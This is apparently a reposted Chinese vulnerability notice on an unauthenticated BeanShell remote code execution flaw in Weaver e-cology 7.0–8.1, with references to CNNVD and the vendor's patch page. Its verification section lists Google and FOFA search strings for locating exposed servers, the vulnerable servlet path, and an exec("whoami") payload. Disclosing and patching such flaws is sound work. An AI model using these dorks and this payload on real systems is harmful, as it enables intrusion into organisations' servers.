泛微e-cology系統遠程代碼執行漏洞


泛微協同管理應用平台(e-cology)是一套兼具企業信息門戶、知識文檔管理、工作流程管理、人力資源管理、客戶關系管理、項目管理、財務管理、資產管理、供應鏈管理、數據中心功能的企業大型協同管理平台。

漏洞源於泛微e-cology系統的JAVA Beanshell接口可被未授權訪問,攻擊者調用該Beanshell接口,可構造特定的HTTP請求繞過泛微本身的安全限制從而遠程命令執行。

漏洞影響版本:

e-cology 7.0

e-cology 8.0

e-cology 8.1

漏洞驗證:

第1步:搜索e-cology系統

可通過Google或FOFA進行搜索,Google搜索語法:inurl:"/login/Login.jsp?logintype=1"

FOFA搜索語法:header="ecology_JSessionId"



第2步:訪問Beanshell接口

URL路徑為:/weaver/bsh.servlet.BshServlet/


第3步:執行Payload

在輸入框中輸入想要執行的Java代碼,如:exec("whoami");


參考鏈接:
http://www.cnnvd.org.cn/web/bulletin/bulletinById.tag?mkid=160
https://mp.weixin.qq.com/s/vGgFSof6FMRGNPyTzuH2gQ
https://www.weaver.com.cn/cs/securityDownload.asp

 


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM